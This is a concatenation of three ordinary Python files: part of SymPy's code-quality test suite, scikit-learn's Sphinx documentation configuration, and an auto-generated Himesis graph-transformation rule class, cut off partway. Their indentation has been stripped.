TOP_PATH = abspath(join(SYMPY_PATH, pardir))
BIN_PATH = join(TOP_PATH, "bin")
EXAMPLES_PATH = join(TOP_PATH, "examples")
# Error messages
message_space = "File contains trailing whitespace: %s, line %s."
message_implicit = "File contains an implicit import: %s, line %s."
message_tabs = "File contains tabs instead of spaces: %s, line %s."
message_carriage = "File contains carriage returns at end of line: %s, line %s"
message_str_raise = "File contains string exception: %s, line %s"
message_gen_raise = "File contains generic exception: %s, line %s"
message_old_raise = "File contains old-style raise statement: %s, line %s, \"%s\""
message_eof = "File does not end with a newline: %s, line %s"
message_multi_eof = "File ends with more than 1 newline: %s, line %s"
message_test_suite_def = "Function should start with 'test_' or '_': %s, line %s"
message_duplicate_test = "This is a duplicate test function: %s, line %s"
message_self_assignments = "File contains assignments to self/cls: %s, line %s."
message_func_is = "File contains '.func is': %s, line %s."
implicit_test_re = re.compile(r'^\s*(>>> )?(\.\.\. )?from .* import .*\*')
str_raise_re = re.compile(
r'^\s*(>>> )?(\.\.\. )?raise(\s+(\'|\")|\s*(\(\s*)+(\'|\"))')
gen_raise_re = re.compile(
r'^\s*(>>> )?(\.\.\. )?raise(\s+Exception|\s*(\(\s*)+Exception)')
old_raise_re = re.compile(r'^\s*(>>> )?(\.\.\. )?raise((\s*\(\s*)|\s+)\w+\s*,')
test_suite_def_re = re.compile(r'^def\s+(?!(_|test))[^(]*\(\s*\)\s*:$')
test_ok_def_re = re.compile(r'^def\s+test_.*:$')
test_file_re = re.compile(r'.*[/\\]test_.*\.py$')
func_is_re = re.compile(r'\.\s*func\s+is')
def tab_in_leading(s):
"""Returns True if there are tabs in the leading whitespace of a line,
including the whitespace of docstring code samples."""
n = len(s) - len(s.lstrip())
if not s[n:n + 3] in ['...', '>>>']:
check = s[:n]
else:
smore = s[n + 3:]
check = s[:n] + smore[:len(smore) - len(smore.lstrip())]
return not (check.expandtabs() == check)
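# For example (illustrative): tab_in_leading("\tx = 1\n") is True, while
# tab_in_leading("    x = 1\t# tab after code\n") is False because the tab
# is not in the leading whitespace.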
def find_self_assignments(s):
"""Returns a list of "bad" assignments: if there are instances
of assigning to the first argument of the class method (except
for staticmethod's).
"""
t = [n for n in ast.parse(s).body if isinstance(n, ast.ClassDef)]
bad = []
for c in t:
for n in c.body:
if not isinstance(n, ast.FunctionDef):
continue
if any(d.id == 'staticmethod'
for d in n.decorator_list if isinstance(d, ast.Name)):
continue
if n.name == '__new__':
continue
if not n.args.args:
continue
if PY3:
first_arg = n.args.args[0].arg
else:
first_arg = n.args.args[0].id
for m in ast.walk(n):
if isinstance(m, ast.Assign):
for a in m.targets:
if isinstance(a, ast.Name) and a.id == first_arg:
bad.append(m)
elif (isinstance(a, ast.Tuple) and
any(q.id == first_arg for q in a.elts
if isinstance(q, ast.Name))):
bad.append(m)
return bad
def check_directory_tree(base_path, file_check, exclusions=set(), pattern="*.py"):
"""
Checks all files in the directory tree (with base_path as starting point)
with the file_check function provided, skipping files that contain
any of the strings in the set provided by exclusions.
"""
if not base_path:
return
for root, dirs, files in walk(base_path):
check_files(glob(join(root, pattern)), file_check, exclusions)
def check_files(files, file_check, exclusions=set(), pattern=None):
"""
Checks all files with the file_check function provided, skipping files
that contain any of the strings in the set provided by exclusions.
"""
if not files:
return
for fname in files:
if not exists(fname) or not isfile(fname):
continue
if any(ex in fname for ex in exclusions):
continue
if pattern is None or re.match(pattern, fname):
file_check(fname)
def test_files():
"""
This test tests all files in sympy and checks that:
      o no line contains trailing whitespace
      o no line ends with \r\n
      o no line uses tabs instead of spaces
      o the file ends with a single newline
      o there are no general or string exceptions
      o there are no old style raise statements
      o names of arg-less test suite functions start with _ or test_
      o no duplicate function names that start with test_
      o no assignments to the self variable in class methods
      o no line contains ".func is" except in the test suite
"""
def test(fname):
if PY3:
with open(fname, "rt", encoding="utf8") as test_file:
test_this_file(fname, test_file)
else:
with open(fname, "rt") as test_file:
test_this_file(fname, test_file)
with open(fname, "rt") as test_file:
source = test_file.read()
result = find_self_assignments(source)
if result:
assert False, message_self_assignments % (fname,
result[0].lineno)
def test_this_file(fname, test_file):
line = None # to flag the case where there were no lines in file
tests = 0
test_set = set()
for idx, line in enumerate(test_file):
if test_file_re.match(fname):
if test_suite_def_re.match(line):
assert False, message_test_suite_def % (fname, idx + 1)
if test_ok_def_re.match(line):
tests += 1
test_set.add(line[3:].split('(')[0].strip())
if len(test_set) != tests:
assert False, message_duplicate_test % (fname, idx + 1)
if line.endswith(" \n") or line.endswith("\t\n"):
assert False, message_space % (fname, idx + 1)
if line.endswith("\r\n"):
assert False, message_carriage % (fname, idx + 1)
if tab_in_leading(line):
assert False, message_tabs % (fname, idx + 1)
if str_raise_re.search(line):
assert False, message_str_raise % (fname, idx + 1)
if gen_raise_re.search(line):
assert False, message_gen_raise % (fname, idx + 1)
if (implicit_test_re.search(line) and
not list(filter(lambda ex: ex in fname, import_exclude))):
assert False, message_implicit % (fname, idx + 1)
if func_is_re.search(line) and not test_file_re.search(fname):
assert False, message_func_is % (fname, idx + 1)
result = old_raise_re.search(line)
if result is not None:
assert False, message_old_raise % (
fname, idx + 1, result.group(2))
if line is not None:
if line == '\n' and idx > 0:
assert False, message_multi_eof % (fname, idx + 1)
elif not line.endswith('\n'):
# eof newline check
assert False, message_eof % (fname, idx + 1)
# Files to test at top level
top_level_files = [join(TOP_PATH, file) for file in [
"isympy.py",
"build.py",
"setup.py",
"setupegg.py",
]]
# Files to exclude from all tests
exclude = set([
"%(sep)ssympy%(sep)sparsing%(sep)sautolev%(sep)s_antlr%(sep)sautolevparser.py" % sepd,
"%(sep)ssympy%(sep)sparsing%(sep)sautolev%(sep)s_antlr%(sep)sautolevlexer.py" % sepd,
"%(sep)ssympy%(sep)sparsing%(sep)sautolev%(sep)s_antlr%(sep)sautolevlistener.py" % sepd,
"%(sep)ssympy%(sep)sparsing%(sep)slatex%(sep)s_antlr%(sep)slatexparser.py" % sepd,
"%(sep)ssympy%(sep)sparsing%(sep)slatex%(sep)s_antlr%(sep)slatexlexer.py" % sepd,
])
# Files to exclude from the implicit import test
import_exclude = set([
# glob imports are allowed in top-level __init__.py:
"%(sep)ssympy%(sep)s__init__.py" % sepd,
# these __init__.py should be fixed:
# XXX: not really, they use useful import pattern (DRY)
"%(sep)svector%(sep)s__init__.py" % sepd,
"%(sep)smechanics%(sep)s__init__.py" % sepd,
"%(sep)squantum%(sep)s__init__.py" % sepd,
"%(sep)spolys%(sep)s__init__.py" % sepd,
"%(sep)spolys%(sep)sdomains%(sep)s__init__.py" % sepd,
# interactive sympy executes ``from sympy import *``:
"%(sep)sinteractive%(sep)ssession.py" % sepd,
# isympy.py executes ``from sympy import *``:
"%(sep)sisympy.py" % sepd,
# these two are import timing tests:
"%(sep)sbin%(sep)ssympy_time.py" % sepd,
"%(sep)sbin%(sep)ssympy_time_cache.py" % sepd,
# Taken from Python stdlib:
"%(sep)sparsing%(sep)ssympy_tokenize.py" % sepd,
# this one should be fixed:
"%(sep)splotting%(sep)spygletplot%(sep)s" % sepd,
# False positive in the docstring
"%(sep)sbin%(sep)stest_external_imports.py" % sepd,
])
check_files(top_level_files, test)
check_directory_tree(BIN_PATH, test, set(["~", ".pyc", ".sh"]), "*")
check_directory_tree(SYMPY_PATH, test, exclude)
check_directory_tree(EXAMPLES_PATH, test, exclude)
def _with_space(c):
# return c with a random amount of leading space
return random.randint(0, 10)*' ' + c
def test_raise_statement_regular_expression():
candidates_ok = [
"some text # raise Exception, 'text'",
"raise ValueError('text') # raise Exception, 'text'",
"raise ValueError('text')",
"raise ValueError",
"raise ValueError('text')",
"raise ValueError('text') #,",
# Talking about an exception in a docstring
        '''"""This function will raise ValueError, except when it doesn't"""''',
"raise (ValueError('text')",
]
str_candidates_fail = [
"raise 'exception'",
"raise 'Exception'",
'raise "exception"',
'raise "Exception"',
"raise 'ValueError'",
]
gen_candidates_fail = [
"raise Exception('text') # raise Exception, 'text'",
"raise Exception('text')",
"raise Exception",
"raise Exception('text')",
"raise Exception('text') #,",
"raise Exception, 'text'",
"raise Exception, 'text' # raise Exception('text')",
"raise Exception, 'text' # raise Exception, 'text'",
">>> raise Exception, 'text'",
">>> raise Exception, 'text' # raise Exception('text')",
">>> raise Exception, 'text' # raise Exception, 'text'",
]
old_candidates_fail = [
"raise Exception, 'text'",
"raise Exception, 'text' # raise Exception('text')",
"raise Exception, 'text' # raise Exception, 'text'",
">>> raise Exception, 'text'",
">>> raise Exception, 'text' # raise Exception('text')",
">>> raise Exception, 'text' # raise Exception, 'text'",
"raise ValueError, 'text'",
"raise ValueError, 'text' # raise Exception('text')",
"raise ValueError, 'text' # raise Exception, 'text'",
">>> raise ValueError, 'text'",
">>> raise ValueError, 'text' # raise Exception('text')",
">>> raise ValueError, 'text' # raise Exception, 'text'",
"raise(ValueError,",
"raise (ValueError,",
"raise( ValueError,",
"raise ( ValueError,",
"raise(ValueError ,",
"raise (ValueError ,",
"raise( ValueError ,",
"raise ( ValueError ,",
]
for c in candidates_ok:
assert str_raise_re.search(_with_space(c)) is None, c
assert gen_raise_re.search(_with_space(c)) is None, c
assert old_raise_re.search(_with_space(c)) is None, c
for c in str_candidates_fail:
assert str_raise_re.search(_with_space(c)) is not None, c
for c in gen_candidates_fail:
assert gen_raise_re.search(_with_space(c)) is not None, c
for c in old_candidates_fail:
assert old_raise_re.search(_with_space(c)) is not None, c
def test_implicit_imports_regular_expression():
candidates_ok = [
"from sympy import something",
">>> from sympy import something",
"from sympy.somewhere import something",
">>> from sympy.somewhere import something",
"import sympy",
">>> import sympy",
"import sympy.something.something",
"... import sympy",
"... import sympy.something.something",
"... from sympy import something",
"... from sympy.somewhere import something",
">> from sympy import *", # To allow 'fake' docstrings
"# from sympy import *",
"some text # from sympy import *",
]
candidates_fail = [
"from sympy import *",
">>> from sympy import *",
"from sympy.somewhere import *",
">>> from sympy.somewhere import *",
"... from sympy import *",
"... from sympy.somewhere import *",
]
for c in candidates_ok:
assert implicit_test_re.search(_with_space(c)) is None, c
for c in candidates_fail:
assert implicit_test_re.search(_with_space(c)) is not None, c
def test_test_suite_defs():
candidates_ok = [
" def foo():\n",
"def foo(arg):\n",
"def _foo():\n",
"def test_foo():\n",
]
candidates_fail = [
"def foo():\n",
"def foo() :\n",
"def foo( ):\n",
"def foo():\n",
]
for c in candidates_ok:
assert test_suite_def_re.search(c) is None, c
for c in candidates_fail:
assert test_suite_def_re.search(c) is not None, c
def test_test_duplicate_defs():
candidates_ok = [
"def foo():\ndef foo():\n",
"def test():\ndef test_():\n",
"def test_():\ndef test__():\n",
]
candidates_fail = [
"def test_():\ndef test_ ():\n",
"def test_1():\ndef test_1():\n",
]
ok = (None, 'check')
def check(file):
tests = 0
test_set = set()
for idx, line in enumerate(file.splitlines()):
if test_ok_def_re.match(line):
tests += 1
test_set.add(line[3:].split('(')[0].strip())
if len(test_set) != tests:
return False, message_duplicate_test % ('check', idx + 1)
return None, 'check'
for c in candidates_ok:
assert check(c) == ok
for c in candidates_fail:
assert check(c) != ok
def test_find_self_assignments():
candidates_ok = [
"class A(object):\n def foo(self, arg): arg = self\n",
"class A(object):\n def foo(self, arg): self.prop = arg\n",
"class A(object):\n def foo(self, arg): obj, obj2 = arg, self\n",
"class A(object):\n @classmethod\n def bar(cls, arg): arg = cls\n",
"class A(object):\n def foo(var, arg): arg = var\n",
]
candidates_fail = [
"class A(object):\n def foo(self, arg): self = arg\n",
"class A(object):\n def foo(self, arg): obj, self = arg, arg\n",
"class A(object):\n def foo(self, arg):\n if arg: self = arg",
"class A(object):\n @classmethod\n def foo(cls, arg): cls = arg\n",
"class A(object):\n def foo(var, arg): var = arg\n",
]
for c in candidates_ok:
assert find_self_assignments(c) == []
for c in candidates_fail:
assert find_self_assignments(c) != []
|
|
# -*- coding: utf-8 -*-
#
# scikit-learn documentation build configuration file, created by
# sphinx-quickstart on Fri Jan 8 09:13:42 2010.
#
# This file is execfile()d with the current directory set to its containing
# dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import warnings
import re
from datetime import datetime
from packaging.version import parse
from pathlib import Path
from io import StringIO
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
sys.path.insert(0, os.path.abspath('sphinxext'))
from github_link import make_linkcode_resolve
import sphinx_gallery
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc', 'sphinx.ext.autosummary',
'numpydoc',
'sphinx.ext.linkcode', 'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.imgconverter',
'sphinx_gallery.gen_gallery',
'sphinx_issues',
'add_toctree_functions',
'sphinx-prompt',
]
# this is needed for some reason...
# see https://github.com/numpy/numpydoc/issues/69
numpydoc_class_members_toctree = False
# For maths, use mathjax by default and svg if NO_MATHJAX env variable is set
# (useful for viewing the doc offline)
if os.environ.get('NO_MATHJAX'):
extensions.append('sphinx.ext.imgmath')
imgmath_image_format = 'svg'
mathjax_path = ''
else:
extensions.append('sphinx.ext.mathjax')
mathjax_path = ('https://cdn.jsdelivr.net/npm/mathjax@3/es5/'
'tex-chtml.js')
autodoc_default_options = {
'members': True,
'inherited-members': True
}
# Add any paths that contain templates here, relative to this directory.
templates_path = ['templates']
# generate autosummary even if no references
autosummary_generate = True
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The main toctree document.
main_doc = 'contents'
# General information about the project.
project = 'scikit-learn'
copyright = (
f'2007 - {datetime.now().year}, scikit-learn developers (BSD License)'
)
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
import sklearn
parsed_version = parse(sklearn.__version__)
version = ".".join(parsed_version.base_version.split(".")[:2])
# The full version, including alpha/beta/rc tags.
# Removes post from release name
if parsed_version.is_postrelease:
release = parsed_version.base_version
else:
release = sklearn.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build', 'templates', 'includes', 'themes']
# The reST default role (used for this markup: `text`) to use for all
# documents.
default_role = 'literal'
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = False
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
html_theme = 'scikit-learn-modern'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {'google_analytics': True,
'mathjax_path': mathjax_path}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['themes']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
html_short_title = 'scikit-learn'
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = 'logos/scikit-learn-logo-small.png'
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = 'logos/favicon.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['images']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
html_additional_pages = {
'index': 'index.html',
'documentation': 'documentation.html'} # redirects to index
# If false, no module index is generated.
html_domain_indices = False
# If false, no index is generated.
html_use_index = False
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'scikit-learndoc'
# If true, the reST sources are included in the HTML build as _sources/name.
html_copy_source = True
# Adds variables into templates
html_context = {}
# finds latest release highlights and places it into HTML context for
# index.html
release_highlights_dir = Path("..") / "examples" / "release_highlights"
# Finds the highlight with the latest version number
latest_highlights = sorted(release_highlights_dir.glob(
"plot_release_highlights_*.py"))[-1]
latest_highlights = latest_highlights.with_suffix('').name
html_context["release_highlights"] = \
f"auto_examples/release_highlights/{latest_highlights}"
# get version from highlight name assuming highlights have the form
# plot_release_highlights_0_22_0
highlight_version = ".".join(latest_highlights.split("_")[-3:-1])
html_context["release_highlights_version"] = highlight_version
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
'preamble': r"""
\usepackage{amsmath}\usepackage{amsfonts}\usepackage{bm}
\usepackage{morefloats}\usepackage{enumitem} \setlistdepth{10}
\let\oldhref\href
\renewcommand{\href}[2]{\oldhref{#1}{\hbox{#2}}}
"""
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [('contents', 'user_guide.tex', 'scikit-learn user guide',
'scikit-learn developers', 'manual'), ]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
latex_logo = "logos/scikit-learn-logo.png"
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
latex_domain_indices = False
trim_doctest_flags = True
# intersphinx configuration
intersphinx_mapping = {
'python': ('https://docs.python.org/{.major}'.format(
sys.version_info), None),
'numpy': ('https://numpy.org/doc/stable', None),
'scipy': ('https://docs.scipy.org/doc/scipy/reference', None),
'matplotlib': ('https://matplotlib.org/', None),
'pandas': ('https://pandas.pydata.org/pandas-docs/stable/', None),
'joblib': ('https://joblib.readthedocs.io/en/latest/', None),
'seaborn': ('https://seaborn.pydata.org/', None),
}
v = parse(release)
if v.release is None:
raise ValueError(
'Ill-formed version: {!r}. Version should follow '
'PEP440'.format(release))
if v.is_devrelease:
binder_branch = 'main'
else:
major, minor = v.release[:2]
binder_branch = '{}.{}.X'.format(major, minor)
class SubSectionTitleOrder:
"""Sort example gallery by title of subsection.
Assumes README.txt exists for all subsections and uses the subsection with
dashes, '---', as the adornment.
"""
def __init__(self, src_dir):
self.src_dir = src_dir
self.regex = re.compile(r"^([\w ]+)\n-", re.MULTILINE)
def __repr__(self):
return '<%s>' % (self.__class__.__name__,)
def __call__(self, directory):
src_path = os.path.normpath(os.path.join(self.src_dir, directory))
# Forces Release Highlights to the top
if os.path.basename(src_path) == "release_highlights":
return "0"
readme = os.path.join(src_path, "README.txt")
try:
with open(readme, 'r') as f:
content = f.read()
except FileNotFoundError:
return directory
title_match = self.regex.search(content)
if title_match is not None:
return title_match.group(1)
return directory
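# Minimal sketch of how the sorter behaves (hypothetical directory name): given
# a README.txt that starts with "Clustering\n----------", calling
# SubSectionTitleOrder('../examples')('cluster') returns "Clustering", while the
# "release_highlights" directory always returns "0" and therefore sorts first.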
sphinx_gallery_conf = {
'doc_module': 'sklearn',
'backreferences_dir': os.path.join('modules', 'generated'),
'show_memory': False,
'reference_url': {
'sklearn': None},
'examples_dirs': ['../examples'],
'gallery_dirs': ['auto_examples'],
'subsection_order': SubSectionTitleOrder('../examples'),
'binder': {
'org': 'scikit-learn',
'repo': 'scikit-learn',
'binderhub_url': 'https://mybinder.org',
'branch': binder_branch,
'dependencies': './binder/requirements.txt',
'use_jupyter_lab': True
},
# avoid generating too many cross links
'inspect_global_variables': False,
'remove_config_comments': True,
}
# The following dictionary contains the information used to create the
# thumbnails for the front page of the scikit-learn home page.
# key: first image in the example's set of generated plots
# value: maximum width in pixels used when resizing the carousel thumbnail
carousel_thumbs = {'sphx_glr_plot_classifier_comparison_001.png': 600}
# enable experimental module so that experimental estimators can be
# discovered properly by sphinx
from sklearn.experimental import enable_iterative_imputer # noqa
from sklearn.experimental import enable_halving_search_cv # noqa
def make_carousel_thumbs(app, exception):
"""produces the final resized carousel images"""
if exception is not None:
return
print('Preparing carousel images')
image_dir = os.path.join(app.builder.outdir, '_images')
for glr_plot, max_width in carousel_thumbs.items():
image = os.path.join(image_dir, glr_plot)
if os.path.exists(image):
c_thumb = os.path.join(image_dir, glr_plot[:-4] + '_carousel.png')
sphinx_gallery.gen_rst.scale_image(image, c_thumb, max_width, 190)
def filter_search_index(app, exception):
if exception is not None:
return
# searchindex only exists when generating html
if app.builder.name != 'html':
return
print('Removing methods from search index')
searchindex_path = os.path.join(app.builder.outdir, 'searchindex.js')
with open(searchindex_path, 'r') as f:
searchindex_text = f.read()
searchindex_text = re.sub(r'{__init__.+?}', '{}', searchindex_text)
searchindex_text = re.sub(r'{__call__.+?}', '{}', searchindex_text)
with open(searchindex_path, 'w') as f:
f.write(searchindex_text)
def generate_min_dependency_table(app):
"""Generate min dependency table for docs."""
from sklearn._min_dependencies import dependent_packages
# get length of header
package_header_len = max(len(package)
for package in dependent_packages) + 4
version_header_len = len('Minimum Version') + 4
tags_header_len = max(len(tags)
for _, tags in dependent_packages.values()) + 4
output = StringIO()
output.write(' '.join(['=' * package_header_len,
'=' * version_header_len,
'=' * tags_header_len]))
output.write('\n')
dependency_title = "Dependency"
version_title = "Minimum Version"
tags_title = "Purpose"
output.write(f'{dependency_title:<{package_header_len}} '
f'{version_title:<{version_header_len}} '
f'{tags_title}\n')
output.write(' '.join(['=' * package_header_len,
'=' * version_header_len,
'=' * tags_header_len]))
output.write('\n')
for package, (version, tags) in dependent_packages.items():
output.write(f'{package:<{package_header_len}} '
f'{version:<{version_header_len}} '
f'{tags}\n')
output.write(' '.join(['=' * package_header_len,
'=' * version_header_len,
'=' * tags_header_len]))
output.write('\n')
output = output.getvalue()
with (Path('.') / 'min_dependency_table.rst').open('w') as f:
f.write(output)
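# Illustrative shape of the generated min_dependency_table.rst (a sketch:
# package names, versions and purposes are placeholders, and column widths are
# padded to the longest entry as computed above):
#
#   =========== =================== ==============
#   Dependency  Minimum Version     Purpose
#   =========== =================== ==============
#   numpy       1.x                 build, install
#   =========== =================== ==============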
def generate_min_dependency_substitutions(app):
"""Generate min dependency substitutions for docs."""
from sklearn._min_dependencies import dependent_packages
output = StringIO()
for package, (version, _) in dependent_packages.items():
package = package.capitalize()
output.write(f'.. |{package}MinVersion| replace:: {version}')
output.write('\n')
output = output.getvalue()
with (Path('.') / 'min_dependency_substitutions.rst').open('w') as f:
f.write(output)
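# Illustrative output line in min_dependency_substitutions.rst (the version is a
# placeholder; note the capitalize() above, so "numpy" yields "Numpy"):
#   .. |NumpyMinVersion| replace:: 1.x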
# Config for sphinx_issues
# we use the issues path for PRs since the issues URL will forward
issues_github_path = 'scikit-learn/scikit-learn'
# Hack to get kwargs to appear in docstring #18434
# TODO: Remove when https://github.com/sphinx-doc/sphinx/pull/8234 gets
# merged
from sphinx.util import inspect # noqa
from sphinx.ext.autodoc import ClassDocumenter # noqa
class PatchedClassDocumenter(ClassDocumenter):
def _get_signature(self):
old_signature = inspect.signature
def patch_signature(subject, bound_method=False, follow_wrapped=True):
# changes the default of follow_wrapped to True
return old_signature(subject, bound_method=bound_method,
follow_wrapped=follow_wrapped)
inspect.signature = patch_signature
result = super()._get_signature()
inspect.signature = old_signature
return result
def setup(app):
app.registry.documenters['class'] = PatchedClassDocumenter
app.connect('builder-inited', generate_min_dependency_table)
app.connect('builder-inited', generate_min_dependency_substitutions)
# to hide/show the prompt in code examples:
app.connect('build-finished', make_carousel_thumbs)
app.connect('build-finished', filter_search_index)
# The following is used by sphinx.ext.linkcode to provide links to github
linkcode_resolve = make_linkcode_resolve('sklearn',
'https://github.com/scikit-learn/'
'scikit-learn/blob/{revision}/'
'{package}/{path}#L{lineno}')
warnings.filterwarnings("ignore", category=UserWarning,
message='Matplotlib is currently using agg, which is a'
' non-GUI backend, so cannot show the figure.')
# maps functions whose names differ from a class name only by letter case to a
# different filename, to avoid collisions on case-insensitive file systems
autosummary_filename_map = {
"sklearn.cluster.dbscan": "dbscan-function",
"sklearn.covariance.oas": "oas-function",
"sklearn.decomposition.fastica": "fastica-function",
}
|
|
from core.himesis import Himesis, HimesisPreConditionPatternLHS
import uuid
class HPos_ChildSchool_CompleteLHS(HimesisPreConditionPatternLHS):
def __init__(self):
"""
Creates the himesis graph representing the AToM3 model HPos_ChildSchool_CompleteLHS.
"""
# Flag this instance as compiled now
self.is_compiled = True
super(HPos_ChildSchool_CompleteLHS, self).__init__(name='HPos_ChildSchool_CompleteLHS', num_nodes=0, edges=[])
# Set the graph attributes
self["mm__"] = []
self["MT_constraint__"] = """#===============================================================================
# This code is executed after the nodes in the LHS have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True enables the rule to be applied,
# returning False forbids the rule from being applied.
#===============================================================================
return True
"""
self["name"] = """"""
self["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'Pos_ChildSchool')
# Nodes that represent match classes
# match class Child() node
self.add_node()
self.vs[0]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[0]["MT_label__"] = """1"""
self.vs[0]["MT_dirty__"] = False
self.vs[0]["mm__"] = """MT_pre__Child"""
self.vs[0]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'')
# match class School() node
self.add_node()
self.vs[1]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[1]["MT_label__"] = """2"""
self.vs[1]["MT_dirty__"] = False
self.vs[1]["mm__"] = """MT_pre__School"""
self.vs[1]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'')
# match class Service() node
self.add_node()
self.vs[2]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[2]["MT_label__"] = """3"""
self.vs[2]["MT_dirty__"] = False
self.vs[2]["mm__"] = """MT_pre__Service"""
self.vs[2]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'')
# Nodes that represent apply classes
# apply class Person() node
self.add_node()
self.vs[3]["MT_subtypeMatching__"] = False
self.vs[3]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[3]["MT_label__"] = """4"""
self.vs[3]["MT_subtypes__"] = []
self.vs[3]["MT_dirty__"] = False
self.vs[3]["mm__"] = """MT_pre__Person"""
self.vs[3]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'')
# apply class SpecialFacility() node
self.add_node()
self.vs[4]["MT_subtypeMatching__"] = False
self.vs[4]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
"""
self.vs[4]["MT_label__"] = """5"""
self.vs[4]["MT_subtypes__"] = []
self.vs[4]["MT_dirty__"] = False
self.vs[4]["mm__"] = """MT_pre__SpecialFacility"""
self.vs[4]["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'')
# Nodes that represent the match associations of the property.
# match association Child--goesTo-->School node
self.add_node()
self.vs[5]["MT_subtypeMatching__"] = False
self.vs[5]["MT_pre__attr1"] = """
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return attr_value == "goesTo"
"""
self.vs[5]["MT_label__"] = """6"""
self.vs[5]["MT_subtypes__"] = []
self.vs[5]["MT_dirty__"] = False
self.vs[5]["mm__"] = """MT_pre__directLink_S"""
